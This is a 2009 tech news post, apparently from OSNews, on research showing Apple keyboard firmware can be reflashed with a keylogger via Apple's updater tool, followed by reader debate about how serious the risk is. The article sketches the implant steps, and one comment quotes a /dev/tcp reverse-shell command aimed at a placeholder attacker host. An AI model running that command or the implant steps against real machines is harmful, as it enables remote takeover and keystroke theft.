Almost everything has a processor and/or memory chips these days, including keyboards. Apple’s keyboards are no exception; they have 8Kb of flash memory, and 256 bytes of RAM. K. Chen has found a way to very easily install keyloggers and other possibly malicious code right inside these Apple keyboards (more here). Proof of concept code is here as well.
While 8Kb of flash memory and 256 bytes of RAM might not sound like a whole lot of space, it’s enough for an intelligent coder to make use of, and for someone with malicious intent to abuse. K. Chen presented his findings at this year’s Black Hat conference.
It’s actually quite easy to abuse the memory and RAM in Apple keyboards, thanks to Apple’s HIDFirmwareUpdaterTool, which is used to update the firmware in HID devices, among which is the Apple keyboard. “The tool is run, a breakpoint set, and then you simply cut and paste the new code into the firmware image in memory. That’s it,” SemiAccurate explains. Nothing is encrypted, decrypted, and it’s all very simple to do. Resume the HIDFirmwareUpdaterTool, and a few seconds later, your keyboard is compromised. Rebooting won’t help, you can’t pull any batteries, and it’s impossible to detect.
K. Chen demonstrated a rudimentary keylogger which would print the last five typed characters. There was 1Kb of free space left inside the keyboard, so you can store quite a few keystrokes. It wouldn’t take much to do this remotely, using a compromised website, for instance.
“Apple needs to patch this problem ASAP. It is completely remotely exploitable, and almost impossible to remove, especially if you don’t know it is there,” SemiAccurate writes, “This huge hole that Apple has in it’s hardware turns any remote exploit, Apple is full of them, into a huge security problem.”
They would’ve told Apple about this, but the last few times when they called Apple in similar cases, the company didn’t even return their calls. “Don’t believe them when they try to spin this as minor, owning a keyboard gives you ownership of a system.”
Chen can write a tool to lock down the firmware, he says, but he’s waiting for a possible official solution from Apple before he attempts to do so. However, he is afraid that Apple will fix this in current and future versions of Mac OS X only, leaving the keyboards open to be attacked from other sources. The fix needs to be implemented at the hardware/firmware level, he says.
“The more they overthink the plumbing, the easier it is to stop up the drain” said Scotty in Star Trek III.
Leave it to Apple to take something that has always been safe before, and turn it into a security nightmare via over-design.
What other Apple-specific dangers lurk in seemingly innocuous Apple hardware, I wonder? Taking into account recent news about real life safety and security dangers in Apple hardware, and Apple’s attempts to suppress news of them, it would not surprise me to see Apple mice spontaneously bursting into flames, or Apple monitors quietly deciding to start emitting x-rays.
Their corporate offices could go up in a fireball, and their sole surviving PR drone would try to blame it on Mr. Coffee.
Edited 2009-08-01 18:46 UTC
Chen theorises that its because Apple needs to rush hardware to market, so instead of properly testing their firmware – which shouldn’t be that hard, it’s a frakking keyboard – they just make the firmware flashable instead. This is indeed what happened when the keyboard first came out.
What we need to know is this: how hard is it to achieve this on keyboards from other manufacturers?
Edited 2009-08-01 19:45 UTC
Even if it were possible (and I suspect this is going to turn out to be Apple specific) the exploit would surely need to be customized for the keyboard family. And for the platform.
Apple would still be the logical target because MacOSX and Apple keyboards go together like… oh… “War” and “Pestilence”. If the exploit code will run, you can be reasonably certain that the keyboard is going to be Apple, and thus vulnerable, most of the time.
Note that this reasoning applies to any future hardware-based exploits, and not just to keyboards.
Edited 2009-08-01 20:06 UTC
Now I really need to find a Griffin iMate. Never cottoned to the shiny new Apple keyboards, so I’d prefer using my old Apple Extended II keyboard when I get a Mac mini.
A big “advantage” of Apple’s exclusive hardware… 🙂
They’re “inside” the computer! And I’m not talking about the files! People are always telling me Apple computers are safer due to better security measures. Riiiight.
Do the Psystar clones exhibit this egregious security hole? Or is just Apple hardware that is so unsafe?
Edited 2009-08-01 19:46 UTC
That is a really good question. Since the flaw itself is in the firmware for the keyboard, I would hazard a guess if the person was using one of the Apple keyboards, then yes, they would be. Of course I have no idea without having the hardware to test it on.
But Psystar doesn’t use Apple hardware. They come with Logitech keyboards and mice, so far as I know.
Probably the hackintoshes are more secure than Macs because of the wide variety of hardware for PCs !
This is the reason why i am happy with my grey PC with a linux distribution. There are M x N different hardware/software combinations to malwares infect, which is much less probable.
Yeah, at least the Windows monoculture exhibits variety in the hardware. MacOSX on Apple hardware is a devastating epidemic looking for a place to happen.
Edited 2009-08-01 20:44 UTC
Good point. It would come down to if Logitech keyboards can be exploited in this manner then.
You guys are on a roll! Keep it coming! 😉
I strongly suspect that Apple is the only one. A lot of other USB keyboards probably have the same problem.
This doesn’t excuse anything of course. It’s quite scary to think, that you own keyboard is spying on you.
Apple is an attractive target for hacking, because exploits always make headlines. I hope Apple will cooperate more with security researches in the future. Their security track record isn’t that great. Apple relied too long an too much on security by obscurity and being a small target.
That would be my guess, Apple these days uses a lot of the same chips under the hood as it’s competitors, (ok, all the same chips now) – as such I’d not be surprised to find out other USB keyboards are at risk.
Makes me glad I’m still using a nice safe near indestructible PS/2 model M – Actually it’s a bastardization the keyboard mechanicals are from a 370 version, the internal board and case is from the AT version with the phone jack, but I have the cable from a PS/2 one which works (since the only difference between PS/2 and AT keyboard is the plug at the PC end)
It really is as sbergman27 said an overthinking of the plumbing.
8K of flash and 256 bytes of RAM? *** sake what’s in there a PicAxe or Atmel? FOR A KEYBOARD?!? Sad when a keyboard has more computing power and live storage than my first computer.
Also proves something I’ve been saying for years, the illusion of safety provided by Apple won’t last… since once enough people are using them to be a viable target they’ve got little to nothing standing between the user and total pwnage compared to other OS and hardware bases.
Edited 2009-08-01 20:35 UTC
Even its Unix foundation is a bit of an illusion from a security standpoint. While the rest of the POSIX world has been moving forward with a variety of hardening techniques and security frameworks, Apple has been fine-tuning their icon colors.
Securitywise, MacOSX’s Darwin underpinnings look like something out of the mid 1990s.
This line is an instant classic!
My Logitech G15 must have some chips inside there. I can see much of it done on the driver side but still, it’s much more than a simple button pad pushing signal out a ps2 or big DIN port.
I can see it now.. “WOW Accounts hijacked through keyboard zombies!”
Sorry to burst your bubble, but your PS2 keyboard can be read from a plug socket http://news.bbc.co.uk/1/hi/technology/8147534.stm
Chorlte
This certainly doesn’t seem as bad as the sensationalists would like you to believe. The Apple firmware updater has to be run, a break point is set and from there your keyboard can be compromised. First off, how is a remote web site going to run this Apple firmware updater? What modern browser can arbitrarily run executables on the host machine (well, perhaps, aside from IE6 but that’s hardly modern). Second, I’ve used the Apple firmware updater. Before it does anything, it prompts you to update the keyboard firmware. This is not something that will happen out of the blue, you must explicitly run the firmware updater first and accept the upgrade and, on OS X anyway, you then need to enter your administrator’s password to confirm the action.
So what we basically have here is a vulnerability that requires physical access to the machine in order to be enabled, and further relies on the keyboard not being at the latest firmware version, as the firmware updater won’t download or run an image unless it’s newer than the current one installed. The only way I can see this being a serious problem is if a hacked firmware image were somehow placed on Apple’s servers (rather unlikely), or dns poisoning to redirect the firmware updater to a different server (possible, but for a rather small payoff by modern standards of cracking). It’s a threat, certainly, but not a huge one.
Interviews after this years Pwn2Own described osX security around the browser as pretty open. A reason it was targeted was that the Safari browser does not provide the same protective layers that other browsers offer (though, the next major version addresses this in some ways I hear). Outcome, browser can run executable code.
Now it’s on the system with no sandboxing to break out of. It needs only escalate it’s privaledge to root. Not easy on a well configured posix base but not impossible.
Now it’s root, it redirects input/output and send the [OK] button press when firmware flasher requires it. Maybe it presents a spoofed layer overtop the actual firmware messagebox and gets it done a-la social engineering.
Injecting break points is a standard part of running software and easily done with root privaledge. Maybe it simply patches in memory as needed for that step.
It’s not like your average skript kiddie is going to get this one but gov and criminal enterprise are already working on it. Attacks never get worse, they only ever get better. If left unpatched, this will become a problem.
All barring one have been knee jerk misinformed Fanboi style comments.
A vulnerability that requires physical access to the machine in order to be enabled, and relies on the keyboard not being at the latest firmware version (the firmware updater won’t download or run an image unless it’s newer than the current one installed) is hardly world shaking news.
I applaud the researchers for finding this and any other potential vulnerability but Im not going to lay awake at night worrying about this one.
well, you seem to be the misinformed fanboi if you believe that apple are the only ones that can write those magical lines of coded needed to flash the firmware
A vulnerability that requires physical access to the machine in order to be enabled, and relies on the keyboard not being at the latest firmware version (the firmware updater won’t download or run an image unless it’s newer than the current one installed) is hardly world shaking news.
Umm, they only need to disassemble the firmware updater and copy the lines of code that do the actual magic of updating the firmware, OR they can just fool it to think the firmware is not the latest available one. POOF! That was the sound of your argument just getting shot down.
Secondly, it does not require physical access: if you can get malware on the Mac then you have access to the keyboard firmware, too.
Thirdly, you don’t need to get malware on the Mac at all or know any passwords or anything if you just can get physical access to the keyboard and attach it to your netbook/notebook/laptop and update the firmware there.
But then you have this other problem… you’d need to convince the users to run it, since it couldn’t be done by a web scripting language and even Safari won’t just execute an arbitrary file on the machine.
But then you have this other problem… you’d need to convince the users to run it, since it couldn’t be done by a web scripting language and even Safari won’t just execute an arbitrary file on the machine.
Do you mean the case of malware infecting the computer and then patching the keyboard? Well, the malware would get on the computer the same way it usually does… either some security hole, or an unknowing user. The firmware on the keyboard doesn’t need to be executed, it’s always running on the keyboard as long as there’s power to it..
Most people can be convinced fairly easily to do something stupid on the computer. This is arguably what makes malware so effective on windows (Ohhh…shiney shit lets install!). Do you really think mac users are so superior that mom and pop wouldn’t click yes, run this crap if it looks official?
Then, its game over. OSX isnt truely anymore secure from a programming standpoint (as the researchers and hackers are showing) but rather due to sizing and time constraints. Why waste time on 5% (or whatever the install base is) and exploiting a hole when you can easily exploit a hole with a user base thats 90%?
Something needs physical access to the keyboard…..
It’s almost as scary as those PS2 Key Loggers that used to goto between keyboard and computer, those things were an epidemic……oh wait, not they weren’t.
I mean seriously, any excuse to slam Apple these days with something everyone else does as well.
Something needs physical access to the keyboard…..
It’s a firmware hack…you DON’T need physical access to the keyboard if you can flash the firmware via a virus/malware/backdoor/etc. So yes, it’s quite a bit more serious than those PS2 keyloggers.. besides, those were rather easy to notice if you looked there. But a firmware hack cannot be detected with plain eyesight, and even in software you’d need to read the firmware and verify it against a known good one.
Well, in that implementation you have to hit return a few times quickly to read the contents out, so you do have to have access to the keyboard to do anything with it.
But anyway, if I am at a point where I am already running arbitrary code on a users machine, I think I would rather install a keylogger in software that has the capability to send the keystrokes directly to my server, rather than install a much crappier keylogger into their keyboard
It’s a cute hack but it’s not really the end of the world.
Edited 2009-08-02 01:39 UTC
You’re right that this isn’t exactly the end of the world. But it isn’t a totally unreasonable thing for a bored hacker to do IN ADDITION to installing a standard software keylogger. If the attack installs a firmware rootkit in the keyboard, it would be tough to know about an eradicate since even a totally clean install would not get rid of it.
On another note, I don’t think we have any reason to believe that this problem applies solely to apple. Other manufacturers probably also have firmware on their keyboards and perhaps they don’t bother to implement a proper code-signing system on their keyboard microcontrollers (it would be prohibitively expensive probably).
And a code signing would be absolutely useless, seeing as how that signature would simply be duplicated. The thing about code signing is that it’s only useful as long as the signature isn’t reversed, as soon as it is the signature might as well not even be there. On a software platform such as a typical PC or even a cel phone, this wouldn’t be a big deal as the signature certificates could simply be updated in the background, but on a tiny embedded system it would be worse than useless even if they did bother to implement it. I doubt many would continuously update their keyboard firmware for new signatures, and it would be too risky to have firmware updates applied automatically without prompting in case the device was bricked due to a crash or loss of power.
If you were to install a hardware keylogger like this, how would you get the logs out of the system?
You’d still need a software component running in order to read the logs from the flash and transmit them away somewhere, and this software component would be just as vulnerable as a regular keylogger to being removed.
This just sounds like a clever idea in theory that provides no real benefit in practice.
Nope, it doesn’t provide that much of real benefit except in cases where you have physical access to the keyboard but the system is secured too tightly to hack into. The keyboard has room for 1000 keystrokes so it’d log your username and password, and as you most likely log in to other services too right after login those credentials would also be stored.
Now, let’s say that you’ve been hired to just clean the floors, wash the windows and such and you do that on the off-hours when no one else is around. You just pop out your netbook, upload the hacked firmware to all nearby machines, finish your job, and then next day download the recorded keystrokes. Voila! You have all the most used usernames and passwords of that company and can do as you please.
Just because you lack the imagination to utilize this doesn’t mean it cannot be utilized by someone with more imagination.
That’s why you never let custodians with netbooks or pre-hacked hardware keyboards into your top secret area. Those damn custodians are always swapping out NICs with pre-hacked sniffing NICs, keyboards with hardware keyloggers inside the keyboards, quick cams that spy on your keyboard (or retina!), microphones in your speakers, peep hole cameras in your mouse. They replace your power cord with an ER sensing and recording one to sniff what you type. They dust your fingerprint scanner and make gel fingers. If you ever find a mousepad with a battery and a wifi chip in it, it’s probably those damn custodians! Damn ACME “custodians” are always hacking stuff.
I was thinking the same.. then I read the full article here: http://www.digitalsociety.org/apple-keyboards-hacked-and-possessed/
So, in fact, its REALLY EASY to send these to a remote server WITHOUT using another malware…
From the article:
“exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0
This would instantly connect the computer to the attacker’s computer and instantly give the attacker full control of the computer at which point additional rootkits could be installed.”
Cya.
The MacOS X computer that your keyboard is plugged into has physical access to the keyboard. Actually, it has physical access to the firmware. Run a piece of malware on your desktop (which, again, has physical access to the keyboard) and you’re compromised.
…some of the articles posted on OSNews are obviously the result of the OSNews teams’ keyboards being hacked and taken over.
some of the user blind themselves, of course this is not a remote way to hack your mac, but that can be part of social engineering process.
Most first typed char on a system are mostly login credential which can give a second foothold on the system by installing other stuff.
Of course it require physical access, but again most “secure OS” users are downplaying some remote vulnerability as long as it is not root access.
I’m wondering whether this vulnerability also applies to my macbook pro. I’m guessing it does, yet remain hopeful.
We sit and argue about something which sounds sensational but in reality is not a huge threat and it keeps us nicely blindsided from the troubles of the world. The man who was shown hacking the keyboard works for the CIA. Oooops… I shouldn’t have said CIA with an Apple keyboard…
——
There’s a knock on my door…
Edited 2009-08-03 00:03 UTC
Are you sure that he works for CIA ? If yes, does it really matter ? Generally, I don’t care for exploits, especially if they aren’t made for Linux
Windows users – watch out 
! as always …
You can always tell… it’s the way they furrow their brows… dead give away… ssshhhh…